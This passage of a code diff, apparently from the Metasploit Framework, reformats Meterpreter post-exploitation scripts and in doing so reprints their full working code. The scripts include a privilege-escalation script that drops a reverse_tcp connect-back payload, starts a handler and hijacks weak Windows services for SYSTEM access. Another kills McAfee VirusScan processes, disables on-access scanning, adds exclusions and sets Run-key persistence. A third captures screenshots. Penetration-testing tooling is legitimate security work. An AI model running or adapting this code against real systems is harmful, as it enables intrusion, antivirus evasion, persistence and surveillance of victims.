print_line "Usage: bgrun screenspy -s windows -d 1 -t 60 => will take interactive Screenshot every 1 sec for 1 min long, windows local mode."
print_line
print_line "Author:Roni Bachar (@roni_bachar) roni.bachar.blog@gmail.com"
- print_line(opts.usage)
- raise Rex::Script::Completed
- end
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ end
}
# Wrong Meterpreter Version Message Function
@@ -72,7 +72,7 @@ outfile = ::File.join(Msf::Config.log_directory,file)
begin
process2mig = "explorer.exe"
-
+
# Actual migration
mypid = session.sys.process.getpid
session.sys.process.get_processes().each do |x|
@@ -100,9 +100,9 @@ begin
f2.puts(data)
end
-
+
if (localsys == "windows")
-
+
print_status("Runing in local mode => windows")
print_status("Opening Interactive view...")
localcmd="start firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html\""
@@ -111,33 +111,35 @@ begin
print_status("Opening Interactive view...")
localcmd="bash firefox -width 530 -height 660 \"file:///#{Msf::Config.install_root}/logs/screenshot/#{host}/video.html&\""
end
-
+
system (localcmd)
- (1..count).each do |i|
+ (1..count).each do |i|
sleep(freq) if(i != 1)
path = File.join(logs,"screenshot.jpeg")
- data = session.espia.espia_image_get_dev_screen
-
- if(data)
- ::File.open(path, 'wb') do |fd|
- fd.write(data)
+ data = session.espia.espia_image_get_dev_screen
+
+ if(data)
+ ::File.open(path, 'wb') do |fd|
+ fd.write(data)
fd.close()
end
- end
-
-
-
+ end
end
+
rescue ::Exception => e
print_status("Interactive Screenshot Failed: #{e.class} #{e} #{e.backtrace}")
end
print_status("The interactive Session ended...")
- data="#{host} - Interactive Session ended 
"
- File.open(path1, 'w') do |f2|
+ data = <<-EOS
+#{host} - Interactive Session ended
+
+
+EOS
+ File.open(path1, 'w') do |f2|
f2.puts(data)
- end
-
+ end
+
rescue ::Exception => e
print_status("Exception: #{e.class} #{e} #{e.backtrace}")
end
diff --git a/scripts/meterpreter/search_dwld.rb b/scripts/meterpreter/search_dwld.rb
index 3cb7b1eac9..9562457d46 100644
--- a/scripts/meterpreter/search_dwld.rb
+++ b/scripts/meterpreter/search_dwld.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
## Meterpreter script that recursively search and download
## files matching a given pattern
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
index 2081f66054..5647079650 100644
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ b/scripts/meterpreter/service_permissions_escalate.rb
@@ -1,201 +1,203 @@
-##
-# $Id: service_permissions_escalate.rb scriptjunkie $
-#
-# Many services are configured with insecure permissions. This
-# script attempts to create a service, then searches through a list of
-# existing services to look for insecure file or configuration
-# permissions that will let it replace the executable with a payload.
-# It will then attempt to restart the replaced service to run the
-# payload. If that fails, the next time the service is started (such as
-# on reboot) the attacker will gain elevated privileges.
-#
-# scriptjunkie googlemail com
-##
-
-if client.platform !~ /win32/
- print_error("This version of Meterpreter is not supported with this Script!")
- raise Rex::Script::Completed
-end
-#
-# Options
-#
-opts = Rex::Parser::Arguments.new(
- "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
- "-h" => [ false, "This help menu"],
- "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
- "-p" => [ true, "The port on the remote host where Metasploit is listening"]
-)
-
-#
-# Default parameters
-#
-
-rhost = Rex::Socket.source_address("1.2.3.4")
-rport = 4444
-aggressive = false
-
-#
-# Option parsing
-#
-opts.parse(args) do |opt, idx, val|
- case opt
- when "-a"
- aggressive = true
- when "-h"
- print_status("Generic weak service permissions privilege escalation.")
- print_line(opts.usage)
- raise Rex::Script::Completed
- when "-r"
- rhost = val
- when "-p"
- rport = val.to_i
- end
-end
-
-# Get the exe payload.
-pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
-pay.datastore['LHOST'] = rhost
-pay.datastore['LPORT'] = rport
-raw = pay.generate
-exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
-#and placing it on the target in %TEMP%
-tempdir = client.fs.file.expand_path("%TEMP%")
-tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = tempdir + "\\" + tempexename + ".exe"
-print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
-fd = client.fs.file.new(tempexe, "wb")
-fd.write(exe)
-fd.close
-
-#get handler to be ready
-handler = client.framework.exploits.create("multi/handler")
-handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
-handler.datastore['LHOST'] = rhost
-handler.datastore['LPORT'] = rport
-handler.datastore['InitialAutoRunScript'] = "migrate -f"
-handler.datastore['ExitOnSession'] = false
-#start a handler to be ready
-handler.exploit_simple(
- 'Payload' => handler.datastore['PAYLOAD'],
- 'RunAsJob' => true
-)
-
-#attempt to make new service
-client.railgun.kernel32.LoadLibraryA("advapi32.dll")
-client.railgun.get_dll('advapi32')
-client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
- [ "DWORD", "hService", "in" ]
-])
-
-#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
-
-print_status("Trying to add a new service...")
-adv = client.railgun.advapi32
-manag = adv.OpenSCManagerA(nil,nil,0x10013)
-if(manag["return"] != 0)
- # SC_MANAGER_CREATE_SERVICE = 0x0002
- newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
- #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
- #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
- if(newservice["return"] != 0)
- print_status("Created service... #{newservice["return"]}")
- ret = adv.StartServiceA(newservice["return"], 0, nil)
- print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
- service_delete("walservice")
- adv.CloseServiceHandle(newservice["return"])
- if aggressive == false
- adv.CloseServiceHandle(manag["return"])
- raise Rex::Script::Completed
- end
- else
- print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
- end
-else
- print_status("No privs to create a service...")
- manag = adv.OpenSCManagerA(nil,nil,1)
- if(manag["return"] == 0)
- print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
- end
-end
-print_status("Trying to find weak permissions in existing services..")
-#Search through list of services to find weak permissions, whether file or config
-serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
-#for each service
-service_list.each do |serv|
- begin
- srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
- if srvtype != "16"
- continue
- end
- moved = false
- configed = false
- #default path, but there should be an ImagePath registry key
- source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
- #get path to exe; parse out quotes and arguments
- sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
- sourcemaybe = client.fs.file.expand_path(sourceorig)
- if( sourcemaybe[0] == '"' )
- sourcemaybe = sourcemaybe.split('"')[1]
- else
- sourcemaybe = sourcemaybe.split(' ')[0]
- end
- begin
- client.fs.file.stat(sourcemaybe) #check if it really exists
- source = sourcemaybe
- rescue
- print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
- end
- #try to exploit weak file permissions
- if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
- client.railgun.kernel32.CopyFileA(tempexe, source, false)
- print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
- moved = true
- end
- #try to exploit weak config permissions
- #open with SERVICE_CHANGE_CONFIG (0x0002)
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- if(servhandleret["return"] != 0)
- #SERVICE_NO_CHANGE is 0xFFFFFFFF
- if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
- print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
- configed = true
- end
- adv.CloseServiceHandle(servhandleret["return"])
-
- end
- if(moved != true && configed != true)
- print_status("No exploitable weak permissions found on #{serv}")
- continue
- end
- print_status("Restarting #{serv}")
- #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
- servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
- if(servhandleret["return"] != 0)
- #SERVICE_CONTROL_STOP = 0x00000001
- if(adv.ControlService(servhandleret["return"],1,56))
- client.railgun.kernel32.Sleep(1000)
- adv.StartServiceA(servhandleret["return"],0,nil)
- print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
- #Cleanup
- if moved == true
- client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
- end
- if configed == true
- servhandleret = adv.OpenServiceA(manag["return"],serv,2)
- adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
- adv.CloseServiceHandle(servhandleret["return"])
- end
- if aggressive == false
- raise Rex::Script::Completed
- end
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- adv.CloseServiceHandle(servhandleret["return"])
- else
- print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
- end
- rescue
- end
-end
-
+##
+# $Id$
+#
+# Many services are configured with insecure permissions. This
+# script attempts to create a service, then searches through a list of
+# existing services to look for insecure file or configuration
+# permissions that will let it replace the executable with a payload.
+# It will then attempt to restart the replaced service to run the
+# payload. If that fails, the next time the service is started (such as
+# on reboot) the attacker will gain elevated privileges.
+#
+# scriptjunkie googlemail com
+#
+# $Revision$
+##
+
+if client.platform !~ /win32/
+ print_error("This version of Meterpreter is not supported with this Script!")
+ raise Rex::Script::Completed
+end
+#
+# Options
+#
+opts = Rex::Parser::Arguments.new(
+ "-a" => [ false, "Aggressive mode - exploit as many services as possible (can be dangerous!)"],
+ "-h" => [ false, "This help menu"],
+ "-r" => [ true, "The IP of the system running Metasploit listening for the connect back"],
+ "-p" => [ true, "The port on the remote host where Metasploit is listening"]
+)
+
+#
+# Default parameters
+#
+
+rhost = Rex::Socket.source_address("1.2.3.4")
+rport = 4444
+aggressive = false
+
+#
+# Option parsing
+#
+opts.parse(args) do |opt, idx, val|
+ case opt
+ when "-a"
+ aggressive = true
+ when "-h"
+ print_status("Generic weak service permissions privilege escalation.")
+ print_line(opts.usage)
+ raise Rex::Script::Completed
+ when "-r"
+ rhost = val
+ when "-p"
+ rport = val.to_i
+ end
+end
+
+# Get the exe payload.
+pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
+pay.datastore['LHOST'] = rhost
+pay.datastore['LPORT'] = rport
+raw = pay.generate
+exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
+#and placing it on the target in %TEMP%
+tempdir = client.fs.file.expand_path("%TEMP%")
+tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
+tempexe = tempdir + "\\" + tempexename + ".exe"
+print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
+fd = client.fs.file.new(tempexe, "wb")
+fd.write(exe)
+fd.close
+
+#get handler to be ready
+handler = client.framework.exploits.create("multi/handler")
+handler.datastore['PAYLOAD'] = "windows/meterpreter/reverse_tcp"
+handler.datastore['LHOST'] = rhost
+handler.datastore['LPORT'] = rport
+handler.datastore['InitialAutoRunScript'] = "migrate -f"
+handler.datastore['ExitOnSession'] = false
+#start a handler to be ready
+handler.exploit_simple(
+ 'Payload' => handler.datastore['PAYLOAD'],
+ 'RunAsJob' => true
+)
+
+#attempt to make new service
+client.railgun.kernel32.LoadLibraryA("advapi32.dll")
+client.railgun.get_dll('advapi32')
+client.railgun.add_function( 'advapi32', 'DeleteService','BOOL',[
+ [ "DWORD", "hService", "in" ]
+])
+
+#SERVICE_NO_CHANGE 0xffffffff for DWORDS or NULL for pointer values leaves the current config
+
+print_status("Trying to add a new service...")
+adv = client.railgun.advapi32
+manag = adv.OpenSCManagerA(nil,nil,0x10013)
+if(manag["return"] != 0)
+ # SC_MANAGER_CREATE_SERVICE = 0x0002
+ newservice = adv.CreateServiceA(manag["return"],"walservice","Windows Application Layer",0x0010,0X00000010,2,0,tempexe,nil,nil,nil,nil,nil)
+ #SERVICE_START=0x0010 SERVICE_WIN32_OWN_PROCESS= 0X00000010
+ #SERVICE_AUTO_START = 2 SERVICE_ERROR_IGNORE = 0
+ if(newservice["return"] != 0)
+ print_status("Created service... #{newservice["return"]}")
+ ret = adv.StartServiceA(newservice["return"], 0, nil)
+ print_status("Service should be started! Enjoy your new SYSTEM meterpreter session.")
+ service_delete("walservice")
+ adv.CloseServiceHandle(newservice["return"])
+ if aggressive == false
+ adv.CloseServiceHandle(manag["return"])
+ raise Rex::Script::Completed
+ end
+ else
+ print_status("Uhoh. service creation failed, but we should have the permissions. :-(")
+ end
+else
+ print_status("No privs to create a service...")
+ manag = adv.OpenSCManagerA(nil,nil,1)
+ if(manag["return"] == 0)
+ print_status("Cannot open sc manager. You must have no privs at all. Ridiculous.")
+ end
+end
+print_status("Trying to find weak permissions in existing services..")
+#Search through list of services to find weak permissions, whether file or config
+serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
+#for each service
+service_list.each do |serv|
+ begin
+ srvtype = registry_getvaldata("#{serviceskey}\\#{serv}","Type").to_s
+ if srvtype != "16"
+ continue
+ end
+ moved = false
+ configed = false
+ #default path, but there should be an ImagePath registry key
+ source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+ #get path to exe; parse out quotes and arguments
+ sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
+ sourcemaybe = client.fs.file.expand_path(sourceorig)
+ if( sourcemaybe[0] == '"' )
+ sourcemaybe = sourcemaybe.split('"')[1]
+ else
+ sourcemaybe = sourcemaybe.split(' ')[0]
+ end
+ begin
+ client.fs.file.stat(sourcemaybe) #check if it really exists
+ source = sourcemaybe
+ rescue
+ print_status("Cannot reliably determine path for #{serv} executable. Trying #{source}")
+ end
+ #try to exploit weak file permissions
+ if(source != tempexe && client.railgun.kernel32.MoveFileA(source, source+'.bak')["return"])
+ client.railgun.kernel32.CopyFileA(tempexe, source, false)
+ print_status("#{serv} has weak file permissions - #{source} moved to #{source + '.bak'} and replaced.")
+ moved = true
+ end
+ #try to exploit weak config permissions
+ #open with SERVICE_CHANGE_CONFIG (0x0002)
+ servhandleret = adv.OpenServiceA(manag["return"],serv,2)
+ if(servhandleret["return"] != 0)
+ #SERVICE_NO_CHANGE is 0xFFFFFFFF
+ if(adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,tempexe,nil,nil,nil,nil,nil,nil))
+ print_status("#{serv} has weak configuration permissions - reconfigured to use exe #{tempexe}.")
+ configed = true
+ end
+ adv.CloseServiceHandle(servhandleret["return"])
+
+ end
+ if(moved != true && configed != true)
+ print_status("No exploitable weak permissions found on #{serv}")
+ continue
+ end
+ print_status("Restarting #{serv}")
+ #open with SERVICE_START (0x0010) and SERVICE_STOP (0x0020)
+ servhandleret = adv.OpenServiceA(manag["return"],serv,0x30)
+ if(servhandleret["return"] != 0)
+ #SERVICE_CONTROL_STOP = 0x00000001
+ if(adv.ControlService(servhandleret["return"],1,56))
+ client.railgun.kernel32.Sleep(1000)
+ adv.StartServiceA(servhandleret["return"],0,nil)
+ print_status("#{serv} restarted. You should get a system meterpreter soon. Enjoy.")
+ #Cleanup
+ if moved == true
+ client.railgun.kernel32.MoveFileExA(source+'.bak', source, 1)
+ end
+ if configed == true
+ servhandleret = adv.OpenServiceA(manag["return"],serv,2)
+ adv.ChangeServiceConfigA(servhandleret["return"],0xFFFFFFFF,0xFFFFFFFF,0xFFFFFFFF,sourceorig,nil,nil,nil,nil,nil,nil)
+ adv.CloseServiceHandle(servhandleret["return"])
+ end
+ if aggressive == false
+ raise Rex::Script::Completed
+ end
+ else
+ print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
+ end
+ adv.CloseServiceHandle(servhandleret["return"])
+ else
+ print_status("Could not restart #{serv}. Wait for a reboot. (or force one yourself)")
+ end
+ rescue
+ end
+end
+
diff --git a/scripts/meterpreter/sound_recorder.rb b/scripts/meterpreter/sound_recorder.rb
index 1a6a6c75ce..f9a75fa61e 100644
--- a/scripts/meterpreter/sound_recorder.rb
+++ b/scripts/meterpreter/sound_recorder.rb
@@ -80,7 +80,7 @@ end
}
# Check for Version of Meterpreter
-wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
+wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
# Create Folder for logs and get path for logs
if not log_folder
diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb
index dd11c7c4db..dc659d132e 100644
--- a/scripts/meterpreter/srt_webdrive_priv.rb
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
##
# South River Technologies WebDrive Service Bad Security Descriptor Local Privilege Escalation.
@@ -63,7 +64,8 @@ opts.parse(args) do |opt, idx, val|
# Set correct service security descriptor to mitigate the vulnerability
print_status("Setting correct security descriptor for the South River Technologies WebDrive Service.")
- client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)", nil, {'Hidden' => 'true'})
+ client.sys.process.execute("cmd.exe /c sc sdset \"#{sname}\" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)",
+ nil, {'Hidden' => 'true'})
end
end
raise Rex::Script::Completed
diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
index 1c7be60da4..26ce4672e4 100644
--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -1,4 +1,5 @@
# $Id$
+# $Revision$
session = client
@@exec_opts = Rex::Parser::Arguments.new(
diff --git a/scripts/meterpreter/virtualbox_sysenter_dos.rb b/scripts/meterpreter/virtualbox_sysenter_dos.rb
index 147ad65020..a472d42035 100644
--- a/scripts/meterpreter/virtualbox_sysenter_dos.rb
+++ b/scripts/meterpreter/virtualbox_sysenter_dos.rb
@@ -3,6 +3,8 @@
# Meterpreter script for triggering the VirtualBox DoS published at:
# http://milw0rm.com/exploits/9323
+# $Revision$
+
opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ]
)
diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb
old mode 100755
new mode 100644
index da0fc22ac2..33508b76e5
--- a/scripts/meterpreter/virusscan_bypass.rb
+++ b/scripts/meterpreter/virusscan_bypass.rb
@@ -1,205 +1,208 @@
-# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
-# order which keeps VirusScan icon visible at system tray without disabled sign on it.
-# Additionally it lets you disable On Access Scanner from registry, upload your detectable
-# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
-# registry key. (Requires administrator privilege. Tested on XP SP3)
-#
-# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
-#
-# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
-
-session = client
-@@exec_opts = Rex::Parser::Arguments.new(
- "-h" => [ false,"Help menu." ],
- "-k" => [ false,"Only kills VirusScan processes"],
- "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
-)
-
-################## function declaration Declarations ##################
-def usage()
- print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
- print_line "----------------------------------------------------------------------------------------------"
- print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
- print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
- print_line "----------------------------------------------------------------------------------------------"
- print_line(@@exec_opts.usage)
-end
-
-@path = ""
-@location = ""
-
-def upload(session,file,trgloc)
- if not ::File.exists?(file)
- raise "File to Upload does not exists!"
- else
- @location = session.fs.file.expand_path("%TEMP%")
- begin
- ext = file.scan(/\S*(.exe)/i)
- if ext.join == ".exe"
- fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
- else
- fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
- end
- @path = fileontrgt
- print_status("Uploading #{file}....")
- session.fs.file.upload_file("#{fileontrgt}","#{file}")
- print_status("Uploaded as #{fileontrgt}")
- rescue ::Exception => e
- print_status("Error uploading file #{file}: #{e.class} #{e}")
- end
- end
- return fileontrgt
-end
-
-#parsing of Options
-file = ""
-helpcall = 0
-killonly = 0
-@@exec_opts.parse(args) { |opt, idx, val|
- case opt
- when "-e"
- file = val || ""
- when "-h"
- helpcall = 1
- when "-k"
- killonly = 1
- end
-
-}
-
-if killonly == 0
- if file == ""
- usage
- raise Rex::Script::Completed
- end
-end
-
-# Magic kill order :)
-avs = %W{
- shstat.exe
- engineserver.exe
- frameworkservice.exe
- naprdmgr.exe
- mctray.exe
- mfeann.exe
- vstskmgr.exe
- mcshield.exe
-}
-
-av = 0
-
-plist = client.sys.process.get_processes()
-plist.each do |x|
- if (avs.index(x['name'].downcase))
- av = av + 1
- end
-end
-
-
-if av > 6
- print_status("VirusScan Enterprise v8.7.0i+ is running...")
-else
- print_status("VirusScan Enterprise v8.7.0i+ is not running!")
- raise Rex::Script::Completed
-end
-
-target_pid = nil
-target ||= "mfevtps.exe"
-
-print_status("Migrating to #{target}...")
-
-# Get the target process pid
-target_pid = client.sys.process[target]
-
-if not target_pid
- print_error("Could not access the target process")
- raise Rex::Script::Completed
-end
-
-print_status("Migrating into process ID #{target_pid}")
-client.core.migrate(target_pid)
-
-target_pid = nil
-
-if killonly == 1
- avs.each do |x|
- # Get the target process pid
- target_pid = client.sys.process[x]
- print_status("Killing off #{x}...")
- client.sys.process.kill(target_pid)
- end
-else
- avs.each do |x|
- # Get the target process pid
- target_pid = client.sys.process[x]
- print_status("Killing off #{x}...")
- client.sys.process.kill(target_pid)
- end
-
- # Upload it
- exec = upload(session,file,"")
-
- # Initiailze vars
- key = nil
- value = nil
- data = nil
- type = nil
-
- # Mcafee registry key
- key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
-
- # Split the key into its parts
- root_key, base_key = client.sys.registry.splitkey(key)
-
- # Disable when writing to disk option
- value = "bScanIncoming"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Disable when reading from disk option
- value = "bScanOutgoing"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Disable detection of unwanted programs
- value = "ApplyNVP"
- data = 0
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Increase the number of excluded items
- value = "NumExcludeItems"
- data = 1
- type = "REG_DWORD"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Add executable to excluded item folder
- value = "ExcludedItem_0"
- data = "3|3|" + @location
- type = "REG_SZ"
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-
- # Set registry to run executable at startup
- key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
- # Split the key into its parts
- root_key, base_key = client.sys.registry.splitkey(key)
- value = "MS"
- data = @path
- open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
- open_key.set_value(value, client.sys.registry.type2str(type), data)
- print_status("Successful set #{key} -> #{value} to #{data}.")
-end
-
-print_status("Finished!")
+# $Id$
+# $Revision$
+
+# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
+# order which keeps VirusScan icon visible at system tray without disabled sign on it.
+# Additionally it lets you disable On Access Scanner from registry, upload your detectable
+# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
+# registry key. (Requires administrator privilege. Tested on XP SP3)
+#
+# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
+#
+# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
+
+session = client
+@@exec_opts = Rex::Parser::Arguments.new(
+ "-h" => [ false,"Help menu." ],
+ "-k" => [ false,"Only kills VirusScan processes"],
+ "-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
+)
+
+################## function declaration Declarations ##################
+def usage()
+ print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
+ print_line "----------------------------------------------------------------------------------------------"
+ print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
+ print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
+ print_line "----------------------------------------------------------------------------------------------"
+ print_line(@@exec_opts.usage)
+end
+
+@path = ""
+@location = ""
+
+def upload(session,file,trgloc)
+ if not ::File.exists?(file)
+ raise "File to Upload does not exists!"
+ else
+ @location = session.fs.file.expand_path("%TEMP%")
+ begin
+ ext = file.scan(/\S*(.exe)/i)
+ if ext.join == ".exe"
+ fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
+ else
+ fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
+ end
+ @path = fileontrgt
+ print_status("Uploading #{file}....")
+ session.fs.file.upload_file("#{fileontrgt}","#{file}")
+ print_status("Uploaded as #{fileontrgt}")
+ rescue ::Exception => e
+ print_status("Error uploading file #{file}: #{e.class} #{e}")
+ end
+ end
+ return fileontrgt
+end
+
+#parsing of Options
+file = ""
+helpcall = 0
+killonly = 0
+@@exec_opts.parse(args) { |opt, idx, val|
+ case opt
+ when "-e"
+ file = val || ""
+ when "-h"
+ helpcall = 1
+ when "-k"
+ killonly = 1
+ end
+
+}
+
+if killonly == 0
+ if file == ""
+ usage
+ raise Rex::Script::Completed
+ end
+end
+
+# Magic kill order :)
+avs = %W{
+ shstat.exe
+ engineserver.exe
+ frameworkservice.exe
+ naprdmgr.exe
+ mctray.exe
+ mfeann.exe
+ vstskmgr.exe
+ mcshield.exe
+}
+
+av = 0
+
+plist = client.sys.process.get_processes()
+plist.each do |x|
+ if (avs.index(x['name'].downcase))
+ av = av + 1
+ end
+end
+
+
+if av > 6
+ print_status("VirusScan Enterprise v8.7.0i+ is running...")
+else
+ print_status("VirusScan Enterprise v8.7.0i+ is not running!")
+ raise Rex::Script::Completed
+end
+
+target_pid = nil
+target ||= "mfevtps.exe"
+
+print_status("Migrating to #{target}...")
+
+# Get the target process pid
+target_pid = client.sys.process[target]
+
+if not target_pid
+ print_error("Could not access the target process")
+ raise Rex::Script::Completed
+end
+
+print_status("Migrating into process ID #{target_pid}")
+client.core.migrate(target_pid)
+
+target_pid = nil
+
+if killonly == 1
+ avs.each do |x|
+ # Get the target process pid
+ target_pid = client.sys.process[x]
+ print_status("Killing off #{x}...")
+ client.sys.process.kill(target_pid)
+ end
+else
+ avs.each do |x|
+ # Get the target process pid
+ target_pid = client.sys.process[x]
+ print_status("Killing off #{x}...")
+ client.sys.process.kill(target_pid)
+ end
+
+ # Upload it
+ exec = upload(session,file,"")
+
+ # Initiailze vars
+ key = nil
+ value = nil
+ data = nil
+ type = nil
+
+ # Mcafee registry key
+ key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
+
+ # Split the key into its parts
+ root_key, base_key = client.sys.registry.splitkey(key)
+
+ # Disable when writing to disk option
+ value = "bScanIncoming"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Disable when reading from disk option
+ value = "bScanOutgoing"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Disable detection of unwanted programs
+ value = "ApplyNVP"
+ data = 0
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Increase the number of excluded items
+ value = "NumExcludeItems"
+ data = 1
+ type = "REG_DWORD"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Add executable to excluded item folder
+ value = "ExcludedItem_0"
+ data = "3|3|" + @location
+ type = "REG_SZ"
+ open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
+ open_key.set_value(value, client.sys.registry.type2str(type), data)
+ print_status("Successful set #{key} -> #{value} to #{data}.")
+
+ # Set registry to run executable at startup
